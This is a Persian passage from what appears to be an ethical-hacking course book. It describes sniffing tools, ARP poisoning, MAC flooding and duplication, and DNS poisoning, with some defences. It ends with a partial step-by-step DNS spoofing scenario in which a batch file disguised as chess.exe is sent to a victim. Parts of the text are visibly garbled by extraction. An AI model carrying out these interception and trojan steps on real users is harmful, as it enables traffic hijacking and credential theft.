اﺑﺰارﻫﺎي ﻫﻚ Ethereal ، ﻳﻚ sniffer راﻳﮕﺎن اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ از ﺷﺒﻜﻪ ﻫﺎي ﻛﺎﺑﻠﻲ ﻳﺎ واﻳﺮﻟﺲ، ﺑﺴﺘﻪ ﻫﺎ را ﺑﺪﺳﺖ آورد . آﺧﺮﻳﻦ ﻧﺴﺨﻪ اﻳﻦ ﻧﺮم اﻓﺰار ﺑﻪ WireShark ﺗﻐﻴﺮ ﻧﺎم ﻳﺎﻓﺘﻪ اﺳﺖ . Ethereal، ﺑﺴﻴﺎر راﻳﺞ و ﻣﺤﺒﻮب اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ راﻳﮕﺎن اﺳﺖ اﻣﺎ ﻣﺸﻜﻼﺗﻲ ﻫﻢ دارد . ﺑﺮاي ﻛﺎرﺑﺮي ﻛﻪ آﻣﻮزش ﻧﺪﻳﺪ ه، ﻧﻮﺷﺘﻦ ﻓﻴﻠﺘﺮ در اﻳﻦ ﻧﺮم اﻓﺰار ﺑﺮاي ﺑﺪﺳﺖ آوردن اﻧﻮاع ﺧﺎﺻﻲ از ﺗﺮاﻓﻴ ﻚ دﺷﻮار اﺳﺖ . .

Snort ، ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﺸﺨﻴﺺ ﻧﻔﻮذ ( IDS ) اﺳﺖ ﻛﻪ داراي ﻗﺎﺑﻠﻴﺖ ﻫﺎي اﺳﺘﺮاق ﺳﻤﻊ ﻧﻴﺰ ﻫﺴﺖ . و ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ اﻧﻮاع ﻣﺨﺘﻠﻒ ﺣﻤﻼت از ﻗﺒﻴﻞ buffer overflow ، ﺣﻤﻼت Server Message Block (SMB) ، CGI probes ، و OS fingerprinting اﺳﺘﻔﺎده ﺷﻮد . .

WinDump ، ﻧﺴﺨﻪ وﻳﻨﺪوزي tcpdump اﺳﺖ ﻛﻪ ﻧﺮم اﻓﺰار آﻧﺎﻟﻴﺰ ﺷﺒﻜﻪ ﺑﺮاي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻳﻮﻧﻴﻜﺲ اﺳﺖ . WinDump ، ﻛﺎﻣﻼ ﺑﺎ tcpdump ﺳﺎزﮔﺎر اﺳﺖ و ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي اﺳﺎس rule ﻫﺎي ﻣﺨﺘﻠﻒ، ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ را ﺗﺸﺨﻴﺺ دﻫﺪ و ذﺧﻴﺮه ﻛﻨﺪ . .

EtherPeek ، ﻳﻚ ﻧﺮم اﻓﺰار اﺳﺘﺮاق ﺳﻤﻊ ﻋﺎﻟﻲ ﺑﺮاي ﺷﺒﻜﻪ ﻫﺎي ﻛﺎﺑﻠﻲ اﺳﺖ ﻛﻪ داراي ﻗﺎﺑﻠﻴﺘﻬﺎي ﻓﻴﻠﺘﺮﻳﻨﮓ ﻗﻮي اﺳﺖ . آﺧﺮﻳﻦ ﻧﺴﺨﻪ اﻳﻦ ﻧﺮم اﻓﺰار ﺑﺎ ﻧﺎم OmniPeek ﻋﺮﺿﻪ ﺷﺪه اﺳﺖ . .

WinSniffer ، ﻧﺮم اﻓﺰار ﺧﻮب ﺑﺮاي اﺳﺘﺮاق ﺳﻤﻊ ﭘﺴﻮردﻫﺎﺳﺖ . ﺗﺮاﻓﻴﻚ ورودي و ﺧﺮوﺟﻲ را ﻣﺎﻧﻴﺘﻮر ﻣﻲ ﻛﻨﺪ و ﻧﺎم ﻫﺎي ﻛﺎرﺑﺮي و ﭘﺴﻮردﻫﺎي IMAP ، Telnet ، SMTP ، ICQ ، HTTP ، POP3 ، FTP ، و NNTP را رﻣﺰﮔﺸﺎﻳﻲ ﻣﻲ ﻛﻨﺪ . .

Iris ، ﻧﺮم اﻓﺰار آﻧﺎﻟ ﻴﺰ ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ و داده اﺳﺖ ﻛﻪ ﺗﻤﺎم ﺗﺮاﻓﻴﻚ داده ﻫﺎي روي ﻳﻚ ﺷﺒﻜﻪ را ﺟﻤﻊ آوري، ذﺧﻴﺮه، ﺳﺎزﻣﺎﻧﺪﻫﻲ و ﮔﺰارش ﻣﻲ ﻛﻨﺪ . ﺑﺮﺧﻼف sniffer ﻫﺎي دﻳﮕﺮ ﺷﺒﻜﻪ، Iris ، ﻣﻲ ﺗﻮاﻧﺪ ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ را ﻣﺠﺪدا ﺑﺴﺎز د از ﻗﺒﻴﻞ ﮔﺮاﻓﻴﻚ ﻫﺎ، ﻣﺴﺘﻨﺪات، و اﻳﻤﻴﻞ ﻫﺎي ﺷﺎﻣﻞ ﺿﻤﺎﺋﻢ . .

ﺑﺮﺧﻲ دﻳﮕﺮ از اﺑﺰارﻫﺎي اﺳﺘﺮاق در ﺷﺒﻜﻪ ﻋﺒﺎرﺗﻨﺪ از : Wiretap ، Pilot ، Look@LAN ، The Dude Sniffer.

اﺳﺘﺮاق ﺳﻤﻊ اﻛﺘﻴﻮ و ﭘﺴﻴﻮ

دو ﻧﻮع ﻣﺨﺘﻠﻒ از اﺳﺘﺮاق ﺳﻤﻊ وﺟﻮد دارد : ﭘﺴﻴﻮ و اﻛﺘﻴﻮ . اﺳﺘﺮاق ﺳﻤﻊ ﭘﺴﻴﻮ ( passive sniffing ) ﺷﺎﻣﻞ ﮔﻮش دادن و ﺑﻪ دﺳﺖ آوردن ﺗﺮاﻓﻴﻚ اﺳﺖ و در ﺷﺒﻜﻪ ﻫﺎﻳﻲ ﻛﻪ ﺑﺎ ﻫﺎب ﺑﻪ ﻳﻜﺪﻳﺮگ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ، ﻣﻔﻴﺪ اﺳﺖ . اﺳﺘﺮاق ﺳﻤﻊ اﻛﺘﻴﻮ ( active sniffing ) ﺷﺎﻣﻞ ﺣﻤﻼت ARP spoofing ﻳﺎ traffic-flooding ﺑﺮ ﻳﻚ ﺳﻮﺋﻴﭻ ﺟﻬﺖ ﺑﻪ دﺳﺖ آوردن ﺗﺮاﻓﻴﻚ اﺳﺖ . ﻫﻤﺎﻧﻄﻮرﻳﻜﻪ از ﻧﺎم آن ﺑﺮ ﻣﻲ آﻳﺪ، اﺳﺘﺮاق ﺳﻤﻊ اﻛﺘﻴﻮ، ﻗﺎﺑﻞ ﺷﻨﺎﺳﺎﻳﻲ اﺳﺖ اﻣﺎ اﺳﺘﺮاق ﺳﻤﻊ ﭘﺴﻴﻮ، ﻗﺎﺑﻞ

110

ﺷﻨﺎﺳﺎﻳﻲ ﻧﻴﺴﺖ . در ﺷﺒﻜﻪ ﻫﺎﻳﻲ ﻛﻪ از ﻫﺎب ﻳﺎ رﺳﺎﻧﻪ واﻳﺮﻟﺲ ﺑﺮاي اﺗﺼﺎل ﺳﻴﺴﺘﻢ ﻫﺎ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨ ﺪ، ﻫﻤﻪ ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎي روي ﺷﺒﻜﻪ، ﻣﻲ ﺗﻮاﻧﻨﺪ ﻫﻤﻪ ﺗﺮاﻓﻴﻚ را ﺑﺒﻴﻨﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، passive packet sniffer ، ﻣﻲ ﺗﻮاﻧﺪ ﺗﺮاﻓﻴﻜﻲ ﻛﻪ ﺑﻴﻦ ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎ و ﻫﺎب اﻧﺘﻘﺎل ﻣﻲ ﻳﺎﺑﺪ را ﺑﺪﺳﺖ آورد . ﺷﺒﻜﻪ ﺳﻮﺋﻴﭽﻲ، ﺑﻪ ﻧﻮع دﻳﮕﺮي ﻛﺎر ﻣﻲ ﻛﻨﺪ . ﺳﻮﺋﻴﭻ، ﺑﻪ داده اي ﻛﻪ درﻳﺎﻓﺖ ﻛﺮده اﺳﺖ ﻧﮕﺎه ﻣﻲ ﻛﻨﺪ و ﺑﺮ ﺣﺴﺐ MAC address ، ﺑﺴﺘﻪ ﻫﺎ را ارﺳﺎل ﻣﻲ ﻛﻨﺪ . ﺳﻮﺋﻴﭻ داراي ﺟﺪوﻟﻲ ﺑﻪ ﻧﺎم MAC table اﺳﺖ ﻛﻪ داراي MAC address و ﭘﻮرت ﻣﺮﺑﻮط ﺑﻪ ﻫﻤﻪ ﺳﻴﺴﺘﻢ ﻫﺎي ﻣﺘﺼﻞ ﺑﻪ آن اﺳﺖ . اﻳﻦ ﺳﺒﺐ ﻣﻲ ﺷﻮد ﻛﻪ ﺳﻮﺋﻴﭻ ﺑﺘﻮاﻧﺪ ﺗﺮاﻓﻴﻚ ﺷﺒﻜﻪ را ﺗﻘﺴﻴﻢ ﺑﻨﺪي ﻛﻨﺪ و ﺗﺮاﻓﻴﻚ را ﺗﻨﻬﺎ ﺑﺮاي ﻣﻘﺼﺪ ﻛﻪ ﺑﺎ MAC address ﻣﺸﺨﺺ ﺷﺪه ﺳا ﺖ ، ، ارﺳﺎل ﻛﻨﺪ . ﺷﺒﻜﻪ ﻫﺎي ﺳﻮﺋﻴﭽﻲ داراي ﺗﻮان ﺧﺮوﺟﻲ ﺑﻬﺘﺮي ﻫﺴﺘﻨﺪ و ﻧﺴﺒﺖ ﺑﻪ ﺷﺒﻜﻪ ﻫﺎﻳﻲ ﻛﻪ ﺑﺎ ﻫﺎب ﺑﺴﺘﻪ ﺷﺪه اﻧﺪ، ﺑﺴﻴﺎر اﻣﻦ ﺗﺮ ﻫﺴﺘﻨﺪ . .

اﺳﺘﺮاق ﺳﻤﻊ اﻛﺘﻴﻮ : :

111

اﺳﺘﺮاق ﺳﻤﻊ ﭘﺴﻴﻮ : :

ARP Poisoning

ARP ، اﺟﺎزه ﺗﺮﺟﻤﻪ آدرس ﻫﺎي IP ﺑﻪ آدرس ﻫﺎي MAC را ﻣﻲ دﻫﺪ . زﻣﺎﻧﻴﻜﻪ ﻛﺎﻣﭙﻴﻮﺗﺮي ﺑﺎ اﺳﺘﻔﺎده از TCP/IP ﺳﻌﻲ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺑ ﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ دﻳﮕﺮي وﺻﻞ ﺷﻮد، ﻧﻴﺎز ﺑﻪ MAC address ﻳﺎ آدرس ﺳﺨﺖ اﻓﺰاري ﻛﺎﻣﭙﻴﻮﺗﺮ دارد . اﺑﺘﺪا ﺑﻪ ﻛﺶ ARP ﺧﻮد ﻧﮕﺎه ﻣﻲ ﻛﻨﺪ ﺗﺎ ﺑﺒﻴﻨﺪ ﻛﻪ آﻳﺎ MAC address آن را دارد ﻳﺎ ﻧﻪ . اﮔﺮ ﻧﺪاﺷﺖ، درﺧﻮاﺳﺖ ARP را broadcast ﻣﻲ ﻛﻨﺪ و ﻣﻲ ﭘﺮﺳﺪ : ﭼﻪ ﻛﺴﻲ آدرس IP ﻛﻪ ﻣﻦ ﺑﻪ دﻧﺒﺎل آن ﻫﺴﺘﻢ را دارد؟ اﮔﺮ ﻛﺎﻣﭙﻴﻮﺗﺮي ﻛﻪ آن آدرس IP را دارد، اﻳﻦ ﻛ ﻮﺋﺮي ARP را درﻳﺎﻓﺖ ﻛﻨﺪ، ﺑﺎ MAC address ﺧﻮد ﺑﻪ آن ﭘﺎﺳﺦ ﻣﻲ دﻫﺪ و ﺑﺎ اﺳﺘﻔﺎده از TCP/IP ﺷﺮوع ﺑﻪ ارﺗﺒﺎط ﻣﻲ ﻛﻨﻨﺪ . .

ARP poisoning ، ﺗﻜﻨﻴﻜﻲ اﺳﺖ ﻛﻪ ﺑﺮاي ﺣﻤﻠﻪ ﺑﻪ ﻳﻚ ﺷﺒﻜﻪ اﺗﺮﻧﺖ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد و ﺑﻪ ﻫﻜﺮ اﺟﺎزه ﻣﻲ دﻫﺪ ﻛﻪ ﻓﺮﻳﻢ ﻫﺎي داده را در ﻳﻚ ﺷﺒﻜﻪ ﻣﺤﻠﻲ ﺳﻮﺋﻴﭽﻲ، sniff ﻛﻨﺪ ﻳﺎ ﻫﻤﮕﻲ ﺗﺮاﻓﻴﻚ را ﻣﺘﻮﻗﻒ ﻛﻨﺪ . ARP poisoning ، در ﺟﺎﺋﻴﻜﻪ ﻫﺪف ارﺳﺎل ﭘﻴﺎم ﻫﺎي ARP ﺟﻌﻠﻲ ﺑﻪ ﻳﻚ ﺷﺒﻜﻪ اﺗﺮﻧﺘﻲ ﺑﺎﺷﺪ، از ARP spoofing اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﻓﺮﻳﻢ ﻫﺎ، داراي MAC address ﻫﺎي ﻧﺎدرﺳﺖ ﻫﺴﺘﻨﺪ ﻛﻪ دﺳﺘﮕﺎه ﻫﺎﻳﻲ ﻫﻤﭽﻮن ﺳﻮﺋﻴﭻ را ﮔﻴﺞ ﻣﻲ ﺪﻨﻛﻨ . در ﻧﺘﻴﺠﻪ، ﻓﺮﻳﻢ ﻫﺎﻳﻲ ﻛﻪ ﻗﺮار ﺑﻮد ﺑﺮاي ﻳﻚ ﻣﺎﺷﻴﻦ ارﺳﺎل ﺷﻮﻧﺪ، ﺑﺼﻮرت اﺷﺘﺒﺎﻫﻲ ﺑﻪ ﻣﺎﺷﻴﻦ دﻳﮕﺮي ﻳﺎ ﺑﻪ ﻳﻚ ﻣﺎﺷﻴﻦ ﻏﻴﺮ ﻗﺎﺑﻞ دﺳﺘﺮس ( ﺣﻤﻠﻪ DoS ) ارﺳﺎل ﻣﻲ ﺷﻮﻧﺪ . ﻫﻤﭽﻨﻴﻦ ARP spoofing ، ﻣﻲ ﺗﻮاﻧﺪ در ﺣﻤﻠﻪ man-in-the-middle ، اﺳﺘﻔﺎده ﺷﻮد ﻛﻪ ﺗﻤﺎم ﺗﺮاﻓﻴﻚ ﺑﺎ اﺳﺘﻔﺎده از ARP spoofing ارﺳﺎل ﻣﻲ ﺷﻮﻧﺪ و ﺑﺮاي ﺑﻪ دﺳﺖ آوردن ﭘﺴﻮردﻫﺎ و اﻃﻼﻋﺎت دﻳﮕﺮ، آﻧﺎﻟﻴﺰ ﻣﻲ ﺷﻮﻧﺪ . .

112

ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از ARP spoofing ، ﻫﻤﻴﺸﻪ MAC address ﻣﺮﺑﻮط ﺑﻪ gateway را ﺑﻪ ARP cache ﺳﻴﺴﺘﻢ اﺿﺎﻓﻪ ﻛﻨﻴﺪ . ﺑﺮاي اﻳﻦ ﻣﻨﻈﻮر ﻣﻲ ﺗﻮاﻧﻴﺪ از دﺳﺘﻮر ARP –s در Cmd وﻳﻨﺪوز و ﺎﺑ ﺿﻤﻴﻤﻪ ﻛﺮدن آدرس IP و MAC ﻣﺮﺑﻮط ﺑﻪ gateway رﺎﻜﻨﻳ، ا ار مﺎﺠﻧا ﺪﻴﻫد . ﺑﺎ اﻳﻨﻜﺎر، ﻫﻜﺮ ﻧﻤﻲ ﺗﻮاﻧﺪ ﺑﺎ اﺳﺘﻔﺎده از overwrite ﻛﺮدن ARP cache اﻗﺪام ﺑﻪ ARP spoofing روي ﺳﻴﺴﺘﻢ ﻛﻨﺪ اﻣﺎ در ﻣﺤﻴﻂ ﻫﺎي ﻛﻪ ﺑﺰرگ ﻫﺴﺘﻨﺪ ﺑﻪ دﻟﻴﻞ ﺗﻌﺪاد زﻳﺎد ﺳﻴﺴﺘﻢ ﻫﺎ، اﻳﻦ ﻋﻤﻞ دﺷﻮار و ﻃﺎﻗﺖ ﻓﺮﺳﺎﻳﻲ اﺳﺖ . در ﻣﺤﻴﻂ ﻫﺎي enterprise ، ﻣﻲ ﺗﻮان port security را روي ﺳﻮﺋﻴﭻ ﻓﻌﺎل ﻛﺮد ﺗﺎ MAC address ﻫﺎ را ﺑﺮاي ﻫﺮ ﭘﻮرت ﺳﻮﺋﻴﭻ ﻣﺸﺨﺺ ﻛﺮد . .

113

MAC Duplicating

ﺣﻤﻠﻪ MAC duplicating ، در ﺷﺒﻜﻪ sniff ﺷﺪه اﺟﺮا ﻣﻲ ﺷﻮد ﺑﺮاي MAC address ﻫﺎي ﻛﻼﻳﻨﺖ ﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﻳﻚ ﭘﻮرت ﺳﻮﺋﻴﭻ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ و از ﻳﻜﻲ از اﻳﻦ آدرس ﻫﺎ دوﺑﺎره اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ ﺑ. ﺎ ﮔﻮش دادن ﺑﻪ ﺗﺮاﻓﻴﻚ روي ﺷﺒﻜﻪ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از MAC address ﻛﺎرﺑﺮ ﻣﺸﺮوع اﺳﺘﻔﺎده ﻛﻨﺪ . ﭘﺲ از آن، ﻫﻜﺮ ﺗﻤﺎم ﺗﺮاﻓﻴﻜﻲ ﻛﻪ ﺑﻪ ﺑﺮاي آن ﻛﺎرﺑﺮ اﺳﺖ را درﻳﺎﻓﺖ ﺧﻮاﻫﺪ ﻛﺮد . از اﻳﻦ ﺗﻜﻨﻴﻚ ﻣﻲ ﺗﻮان در ﺷﺒﻜﻪ ﻫﺎي واﻳﺮﻟﺲ ﻛﻪ MAC filtering ﻓﻌﺎل ﺷﺪه اﺳﺖ اﺳﺘﻔﺎده ﻛﺮد . .

Capture ﻛﺮدن ﺗﻮﺳﻂ Ethereal و ﻧﻤﺎﻳﺶ ﻓﻴﻠﺘﺮﻫﺎ

Ethereal ، ﻧﺮم اﻓﺰار راﻳﮕﺎﻧﻲ ﺑﺮاي اﺳﺘﺮاق ﺳﻤﻊ اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺴﺘﻪ ﻫﺎ را از ﻳﻚ ﻛﺎرت ﺷﺒﻜﻪ ﺑﺪﺳﺖ آورد . در زﻳﺮ ﭼﻨﺪ ﻣﺜﺎل از ﻓﻴﻠﺘﺮﻫﺎي اﻳﻦ ﺑﺮﻧﺎﻣﻪ آورده ﺷﺪه اﺳﺖ : :

• ip.dst eq www.eccouncil.org : اﻳﻦ ﻓﻴﻠﺘﺮ، ﺗﻨﻬﺎ ﺑﺴﺘﻪ ﻫﺎﻳﻲ ﻛﻪ ﺑ ﻪ ﻣﻘﺼﺪ وب ﺳﺮور www.eccouncil.org اﺳﺖ را ﻣﻲ ﮔﻴﺮد. • ip.src == 192.168.1.1 : اﻳﻦ ﻓﻴﻠﺘﺮ ﺗﻨﻬﺎ ﺑﺴﺘﻪ ﻫﺎﻳﻲ ﻛﻪ از 192,168,1,1 ﻣﻲ آﻳﻨﺪ را ﻣﻲ ﮔﻴﺮد. • eth.dst eq ff:ff:ff:ff:ff:ff : اﻳﻦ ﻓﻴﻠﺘﺮ، ﺗﻨﻬﺎ ﺑﺴﺘﻪ ﻫﺎي broadcast ﻻﻳﻪ 2 را ﻣﻲ ﮔﻴﺮد.

114

MAC Flooding

ﻧ ﺮم اﻓﺰار sniffer ﻧﻤﻲ ﺗﻮاﻧﺪ در ﻳﻚ ﺷﺒﻜﻪ ﺳﻮﺋﻴﭽﻲ، ﺗﺮاﻓﻴﻚ را ﺑﮕﻴﺮد اﻣﺎ در ﺷﺒﻜﻪ ﻫﺎب ﻣﻲ ﺗﻮاﻧﺪ . در ﻋﻮض، ﻣﻲ ﺗﻮاﻧﺪ ﺗﺮاﻓﻴﻜﻲ ورودي ﻳﺎ ﺧﺮوﺟﻲ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ را ﺑﮕﻴﺮد ﻦﻳاﺮﺑﺎﻨﺑ. مزﻻ ﺳا ﺖ ﻛﻪ از اﺑﺰارﻫﺎي دﻳﮕﺮي ﺑﺮاي ﺑﺪﺳﺖ آوردن ﺗﻤﺎم ﺗﺮاﻓﻴﻚ در ﻳﻚ ﺷﺒﻜﻪ ﺳﻮﺋﻴﭽﻲ اﺳﺘﻔﺎده ﻛﻨﻴﺪ . دو روش ﺑﺮاي اﻧﺠﺎم اﺳﺘﺮاق ﺳﻤﻊ اﻛﺘﻴﻮ وﺟﻮد دارد ﺗﺎ ﺳﻮﺋﻴﭻ، ﺗﺮاﻓﻴﻚ را ﺑﻪ ﺳﻴﺴﺘﻤﻲ ﻛﻪ sniffer دارد ارﺳﺎل ﺷﻮد : ARP spoofing و flooding . .

ARP spoofing ، ﮔﺮﻓﺘﻦ MAC address ﻣﺮﺑﻮط ﺑﻪ gateway ﺷﺒﻜﻪ و در ﻧﺘﻴﺠﻪ درﻳﺎﻓﺖ ﻫﻤﻪ ﺗﺮاﻓﻴﻜﻲ ﻛﻪ ﺑﻪ ﻣﻘﺼﺪ gateway ﻣﻲ روﻧﺪ ﺑﻪ ﺳﻴﺴﺘﻤﻲ اﺳﺖ ﻛﻪ sniffer دارد . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧ ﺪ ﺳﻮﺋﻴﭻ را ﺑﺎ ﺳﺮازﻳﺮي ﺗﺮاﻓﻴﻚ زﻳﺎد ﺑﻪ آن، flood ﻛﻨﺪ ﺗﺎ ﻋﻤﻠﻜﺮد آن ﺑﻪ ﻋﻨﻮان ﺳﻮﺋﻴﭻ ﻣﺨﺘﻞ ﺷﻮد و ﻣﺜﻞ ﻫﺎب، ﺗﺮاﻓﻴﻚ را ﺑﻪ ﺗﻤﺎم ﭘﻮرت ﻫﺎي ﺧﻮد ارﺳﺎل ﻛﻨﺪ . اﻳﻦ ﻧﻮع ﺣﻤﻼت اﺳﺘﺮاق ﺳﻤﻊ اﻛﺘﻴﻮ، ﺑﻪ ﺳﻴﺴﺘﻤﻲ ﻛﻪ sniffer دارد اﺟﺎزه ﻣﻲ دﻫﺪ ﻛﻪ ﺗﻤﺎم ﺗﺮاﻓﻴﻚ روي ﺷﺒﻜﻪ را ﺑﺪﺳﺖ آورد . .

115

DNS Poisoning

DNS poisoning ) DNS poisoning ،) ﺗﻜﻨﻴﻜﻲ اﺳﺖ ﻛﻪ ﺳﺮور DNS را ﻓﺮﻳﺐ ﻣﻲ دﻫﺪ ﺗﺎ ﮔﻤﺎن ﻛﻨﺪ اﻃﻼﻋﺎت ﻫﻮﻳﺘﻲ را درﻳﺎﻓﺖ ﻛﺮده اﺳﺖ وﻟﻲ در ﺣﺎﻟﻴﻜﻪ درﻳﺎﻓﺖ ﻧﻜﺮده اﺳﺖ . زﻣﺎﻧﻴﻜﻪ ﺳﺮور DNS ، ﻣﺴﻤﻮم ﺷﺪ، اﻃﻼﻋﺎت ﺑﻄﻮر ﻛﻠﻲ ﺑﺮاي ﻣﺪﺗﻲ ﻛﺶ ﺧﻮاﻫﺪ ﺷﺪ، ﺗﺎﺛﻴﺮ ﺣﻤﻠﻪ را ﺑﻪ ﻛﺎرﺑﺮان ﺳﺮور ﻣﻨﺘﺸﺮ ﻣﻲ ﻛﻨﺪ . زﻣﺎﻧﻴﻜﻪ ﻛﺎرﺑﺮي درﺧﻮاﺳﺖ URL ﻳﻚ وب ﺳﺎﻳﺖ ار ﻣﻲ ﻛﻨﺪ، آدرس ﺑﻪ ﺳﺮور DNS ﻣﺮاﺟﻌﻪ ﻣﻲ ﻛﻨﺪ ﺗﺎ آدرس IP ﻣﺮﺑﻮﻃﻪ را ﭘﻴﺪا ﻛﻨﺪ . اﮔﺮ ﺳﺮور DNS ﻫﻚ ﺷ دﻮ ، ﻛﺎرﺑﺮ ﺑﻪ وب ﺳﺎﻳﺖ دﻳﮕﺮي ﻓﺮ ﺳﺘﺎده ﻣﻲ ﺷﻮد . .

اﻳﻦ ﺗﻜﻨﻴﻚ ﻣﻲ ﺗﻮاﻧﺪ ﺑﺮاي ﺟﺎﻳﮕﺰﻳﻨﻲ ﻣﺤﺘﻮاي ﻗﺮاردادي ﺑﺎ ﻣﺤﺘﻮاﻳﻲ ﻛﻪ ﻫﻜﺮ اﻧﺘﺨﺎب ﻛﺮده ﺳا ﺖ ، اﺳﺘﻔﺎده ﺷﻮد . ﺑﺮاي ﻣﺜﺎل، ﻫﻜﺮ، آدرس ﻫﺎي IP ورودي ﻫﺎي DNS را ﺑﺮاي ﻳﻚ وب ﺳﺎﻳﺖ ﻣﺴﻤﻮم ﻣﻲ ﻛﻨﺪ و آن را ﺑﺎ آدرس IP ﺳﺮوري ﻛﻪ ﻫﻜﺮ ﻛﻨﺘﺮل ﻣﻲ ﻛﻨﺪ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲ ﻛﻨﺪ . ﺳﭙﺲ ورودي ﻫﺎي ﺟﻌﻠﻲ ﺑﺮاي ﻓﺎﻳﻞ ﻫﺎﻳﻲ ﻛﻪ روي اﻳﻦ ﺳﺮور وﺟﻮد دارﻧﺪ ﻣﻲ ﺳﺎزد ﻛﻪ ﺑﺎ آﻧﻬﺎﻳﻲ ﻛﻪ در ﺳﺮور ﻫﺪف وﺟﻮد دارﻧﺪ، ﻣﺸﺎﺑﻪ ﺑﺎﺷﺪ . اﻳﻦ ﻓﺎﻳﻞ ﻫﺎ ﻣﻲ ﺗﻮاﻧﺪ ياراد ﻛﺪﻫﺎي ﻣﺨﺮب ﺑﺎﺷﺪ از ﻗﺒﻴﻞ worm ﻳﺎ ﻳﻚ وﻳﺮوس . .

اﻧﻮاع ﺗﻜﻨﻴﻚ ﻫﺎي DNS poisoning ﻋﺒﺎرﺗﻨﺪ از : :

• Intranet spoofing : ﺑﻪ ﻋﻨﻮان دﺳﺘﮕﺎﻫﻲ در ﻫﻤﺎن ﺷﺒﻜﻪ داﺧﻠﻲ ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ. • Internet spoofing : ﺑﻪ ﻋﻨﻮان دﺳﺘﮕﺎﻫﻲ در اﻳﻨﺘﺮﻧﺖ ﻋﻤﻞ ﻣﻲ ﻛﻨﺪ. • Proxy server DNS poisoning : ورودي ﻫﺎي DNS را روي ﭘﺮوﻛﺴﻲ ﺳﺮور ﺗﻐﻴﻴﺮ ﻣﻲ دﻫﺪ ﺗﺎ ﻛﺎرﺑﺮ ﺑﻪ ﺳﻴﺴﺘﻢ دﻳﮕﺮي ﻫﺪاﻳﺖ ﺷﻮد. • DNS cache poisoning : ورودي ﻫﺎي DNS را روي ﻫﺮ ﺳﻴﺴﺘﻢ ﺗﻐﻴﻴﺮ ﻣﻲ دﻫﺪ ﺗﺎ ﻛﺎرﺑﺮ ﺑﻪ ﻣﺎﺷﻴﻦ دﻳﮕﺮي ﻫﺪاﻳﺖ ﺷﻮد.

116

: : Intranet DNS Spoofing

ﺑﺮاي اﻳﻦ ﺗﻜﻨﻴﻚ، ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﻪ LAN ﻣﺘﺼﻞ ﺑﺎﺷﻴﺪ و ﺑﺘﻮاﻧﻴﺪ ﺑﺴﺘﻪ ﻫﺎ را sniff ﻛﻨﻴﺪ . ﺑﺎ ﻣﺴﻤﻮم ﻛﺮدن ARP روﺗﺮ، در ﺷﺒﻜﻪ ﻫﺎي ﺳﻮﺋﻴﭽﻲ ﻛﺎر ﻣﻲ ﻛﻨﺪ . .

: : Internet DNS Spoofing

ﺑﺮاي ﻫﺪاﻳﺖ ﺗﻤﺎم ﺗﺮاﻓﻴﻚ درﺧﻮاﺳﺖ ﻫﺎي DNS از ﻛﺎﻣﭙﻴﻮﺗﺮ ﻣﻴﺰﺑﺎن ﺑﻪ ﺳﻤﺖ ﺷﻤﺎ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . .

ﺷﻜﻞ ﺻﻔﺤﻪ ﺑﻌﺪ، ﺳﻨﺎرﻳﻮي Internet DNS Spoofing را ﻧﺸﺎن ﻣﻲ دﻫﺪ . .

.1 ﻳﻚ وب ﺳﺎﻳﺖ ﺟﻌﻠﻲ ﺑﺮ روي ﻛﺎﻣﭙﻴﻮﺗﺮ ﺧﻮد اﻳﺠﺎد ﻛﻨﻴﺪ. .Treewalk 2 را ﻧﺼﺐ ﻛﻨﻴﺪ و ﻓﺎﻳﻞ readme.txt را ﺑﻪ آدرس IP ﺧﻮد ﺗﻐﻴﻴﺮ دﻫﻴﺪ، Treewalk ، ﺷﻤﺎ را ﺳﺮور DNS ﺧﻮاﻫﺪ ﻛﺮد. .3 ﻓﺎﻳﻞ dns-spoofing.bat را ﺑﺎ آدرس IP ﺧﻮدﺗﺎن اﺻﻼح ﻛﻨﻴﺪ. .4 ﻓﺎﻳﻞ dns-spoofing.bat را ﺑﻪ Jessica ﺑﻔﺮﺳﺘﻴﺪ ( ﻣﺜﻼ chess.exe) .5 زﻣﺎﻧﻴﻜﻪ ﻛﺎرﺑﺮ ﺑﺮوي ﻓﺎﻳﻞ ﺗﺮوﺟﺎﻧﻲ ﻛﻠﻴﻚ ﻣﻲ ﻛﻨﺪ، در properties ﻛﺎرت ﺷﺒﻜﻪ او، DNS را ﺑﺎ آدر س دﺳﺘﮕﺎه ﺷﻤﺎ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲ ﻛﻨﺪ. .6 ﺷﻤﺎ ﺑﺮاي Jessica ، ﺑﻪ ﻋﻨﻮان ﺳﺮور DNS ﺧﻮاﻫﻴﺪ ﺑﻮد و درﺧﻮاﺳﺖ ﻫﺎي DNS او از ﻃﺮﻳﻖ ﺷﻤﺎ رد ﺧﻮاﻫﺪ ﺷﺪ. .7 زﻣﺎﻧﻴﻜﻪ Jessica ، ﺑﻪ XSECURITY.com ﻣﺘﺼﻞ 